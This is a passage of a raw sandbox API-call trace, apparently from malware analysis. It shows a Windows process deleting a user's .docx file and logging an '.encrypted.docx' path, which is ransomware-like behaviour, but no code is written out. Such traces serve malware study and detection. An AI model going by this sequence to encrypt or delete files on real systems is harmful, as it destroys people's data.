(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.347] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.347] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.347] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.348] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0035.348] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.348] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.348] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0035.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88ceb0 [0035.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88ceb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0035.349] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.349] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.349] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.349] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.349] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0035.349] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.349] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.349] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0035.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.350] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.350] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.350] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.350] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0035.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx", lpFilePart=0x0) returned 0x65 [0035.350] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720f9900, ftCreationTime.dwHighDateTime=0x1d5b74c, ftLastAccessTime.dwLowDateTime=0x415d5310, ftLastAccessTime.dwHighDateTime=0x1d5bb84, ftLastWriteTime.dwLowDateTime=0x14c6f040, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xaafb, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="YjePcpmZ.docx", cAlternateFileName="YJEPCP~1.DOC")) returned 0x7c2100 [0035.350] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\yjepcpmz.docx")) returned 1 [0035.352] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720f9900, ftCreationTime.dwHighDateTime=0x1d5b74c, ftLastAccessTime.dwLowDateTime=0x415d5310, ftLastAccessTime.dwHighDateTime=0x1d5bb84, ftLastWriteTime.dwLowDateTime=0x14c6f040, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xaafb, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="YjePcpmZ.docx", cAlternateFileName="YJEPCP~1.DOC")) returned 0 [0035.352] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.352] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.352] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.353] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.353] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.353] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.353] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.353] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.353] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.354] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.354] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.354] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.354] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.354] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.354] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.354] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x18f5, lpOverlapped=0x0) returned 1 [0035.354] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.354] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x18f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.354] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.encrypted.docx\r\n", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0035.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x72) returned 0x7800d0 [0035.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.encrypted.docx\r\n", cchWideChar=114, lpMultiByteStr=0x7800d0, cbMultiByte=114, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.encrypted.docx\r\n", lpUsedDefaultChar=0x0) returned 114 [0035.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0035.355] WriteFile (in: hFile=0x140, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x71, lpOverlapped=0x0) returned 1 [0035.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.355] CloseHandle (hObject=0x140) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.356] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.356] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 